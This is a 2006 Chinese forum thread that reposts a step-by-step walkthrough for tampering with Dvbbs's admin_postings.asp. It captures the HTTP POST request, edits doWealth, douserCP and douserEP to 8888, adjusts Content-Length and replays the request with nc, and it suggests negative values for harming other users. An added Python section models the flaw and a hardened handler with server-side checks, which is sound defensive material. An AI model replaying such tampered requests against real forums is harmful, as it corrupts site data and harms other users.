中国德迷联盟 - GerFans.cn


Dvbbs forum score and experience inflation vulnerability

Thread starter | 德國戰車 posted on 2006-8-6 10:43:09
Article author: fhod
Source: Evil Octal Information Security Team (www.eviloctal.com)

Dvbbs does not lock down admin_postings.asp properly. When promoting a post, you can set the numbers yourself, which lets you inflate your score, experience and charm points.
For example, I have a post:
http://127.0.0.1/dispbbs.asp?boardID=30&ID=26954&page=1
Then I promote this post:
http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954

By default the highest promotion amount is 50.

At this point we use WSockExpert to capture the packet. The captured packet is:

POST /admin_postings.asp?action=uptopic HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=617&usercookies=2&password=hjf87126ffz2C3g7y&userhidden=1&userclass=%B0%E6%D6%F7&username=fhod&StatUserID=6127457519; style=null; ASPSESSIONIDCQTDACAT=JHKDJPECDFDKJHDABKIGCLEM; Dvbbs=; upNum=0

title=%BA%C3%CE%C4%D5%C2&content=%BA%C3&doWealth=50&douserCP=50&douserEP=50&ID=26954&replyID=&boardID=30&msg=&submit=%C8%B7%C8%CF%B2%D9%D7%F7

Then we modify it.
The values to change are in this segment:
doWealth=50&douserCP=50&douserEP=50
Change them to any number you like. Here I changed it to doWealth=8888&douserCP=8888&douserEP=8888, for good luck, haha.
Because the numbers changed, the byte count grew too. I added 6 characters, so that is 6 more bytes. The original
Content-Length: 141
becomes
Content-Length: 147

The finished packet is:

POST /admin_postings.asp?action=uptopic HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://127.0.0.1/admin_postings.asp?action=提升&BoardID=30&ID=26954
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 147
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=617&usercookies=2&password=hjf87126ffz2C3g7y&userhidden=1&userclass=%B0%E6%D6%F7&username=fhod&StatUserID=6127457519; style=null; ASPSESSIONIDCQTDACAT=JHKDJPECDFDKJHDABKIGCLEM; Dvbbs=; upNum=0

title=%BA%C3%CE%C4%D5%C2&content=%BA%C3&doWealth=8888&douserCP=8888&douserEP=8888&ID=26954&replyID=&boardID=30&msg=&submit=%C8%B7%C8%CF%B2%D9%D7%F7

Then submit it with nc:

c:\nc 127.0.0.1 80 <1.txt

Submit it several times over; the result is shown in the image below.

This test was carried out as a moderator; ordinary users have not been tested yet. My idea is this: set up a BBS locally, log in as a moderator and capture the cookie packet; then log in to a forum as an ordinary user, make a post and capture a packet; then modify the two packets and submit. If admin_postings.asp really is not checked strictly, this should achieve the same thing. This vulnerability is not that useful, but on forums where you need a certain amount of gold, charm or experience before you can view a post, it comes in very handy. Of course, if you want to mess with someone, you can just change the numbers to negative values, but remember to set Content-Length correctly.
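The root cause described in the post is that the server applies whatever doWealth, douserCP and douserEP values the client sends, with the limit of 50 enforced only by the form. What follows is an added example, not part of the original post and not Dvbbs's own ASP code: a small Python model of the vulnerable handler next to a hardened one that enforces the role check, the value range and the integer type on the server. The field names and the sample body are taken from the captured packet above; the function names, the role model and the ceiling of 50 are assumptions drawn from the post's statement that the default maximum is 50.

```python
from urllib.parse import parse_qs

# Assumption: the form's highest offered value (50, per the post) is the
# ceiling the server should enforce. Dvbbs's real limit logic is not shown.
MAX_BONUS = 50
BONUS_FIELDS = ("doWealth", "douserCP", "douserEP")  # names from the packet


class RejectedRequest(Exception):
    """Raised by the hardened handler when a request must not be applied."""


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_uptopic(form: dict, user: dict) -> dict:
    """Model of the behaviour the post describes (hypothetical, not Dvbbs code):
    the client's numbers are applied verbatim, so 8888 or -8888 goes through."""
    return {field: int(form.get(field, "0")) for field in BONUS_FIELDS}


def hardened_uptopic(form: dict, user: dict) -> dict:
    """Server-side checks that close the gap: the caller must hold the role that
    may award bonuses, each value must be a non-negative integer, and none may
    exceed the ceiling the form offers. Nothing here trusts the client."""
    if user.get("role") != "moderator":
        raise RejectedRequest("caller is not allowed to award bonuses")
    awarded = {}
    for field in BONUS_FIELDS:
        raw = form.get(field, "0")
        if not raw.isdigit():  # rejects "-8888", "", "8888abc"
            raise RejectedRequest(f"{field}: not a non-negative integer: {raw!r}")
        value = int(raw)
        if value > MAX_BONUS:
            raise RejectedRequest(f"{field}={value} exceeds the limit of {MAX_BONUS}")
        awarded[field] = value
    return awarded


# Constructed sample bodies, modelled on the packet quoted in the post.
ORIGINAL_BODY = ("title=%BA%C3%CE%C4%D5%C2&content=%BA%C3&doWealth=50&douserCP=50"
                 "&douserEP=50&ID=26954&replyID=&boardID=30&msg=&submit=%C8%B7%C8%CF")
TAMPERED_BODY = ORIGINAL_BODY.replace("=50", "=8888")
NEGATIVE_BODY = ORIGINAL_BODY.replace("doWealth=50", "doWealth=-8888")

# Constructed users; the role values are an assumption of this example.
MODERATOR = {"name": "fhod", "role": "moderator"}
MEMBER = {"name": "someone", "role": "member"}


def outcome(handler, body: str, user: dict) -> tuple:
    """Run one handler over one body and report ('applied', values) or
    ('rejected', reason) so the two handlers can be compared side by side."""
    try:
        return ("applied", handler(parse_form(body), user))
    except RejectedRequest as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    cases = (("original", ORIGINAL_BODY), ("tampered", TAMPERED_BODY),
             ("negative", NEGATIVE_BODY))
    for label, body in cases:
        print(f"{label:9} vulnerable: {outcome(vulnerable_uptopic, body, MODERATOR)}")
        print(f"{label:9} hardened:   {outcome(hardened_uptopic, body, MODERATOR)}")
    print("member    hardened:  ", outcome(hardened_uptopic, ORIGINAL_BODY, MEMBER))
```

Running the script shows the vulnerable model applying 8888 and -8888 as-is, while the hardened model accepts only the original 50/50/50 body from a moderator and rejects the tampered, negative and non-moderator requests. The same rule is what an application-layer log check would key on: any uptopic request whose bonus fields fall outside 0..50, or whose session lacks the moderator role, is worth alerting on.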
supperbatman posted on 2006-8-11 13:47:00
Ordinary users can't do it; you have to be a moderator.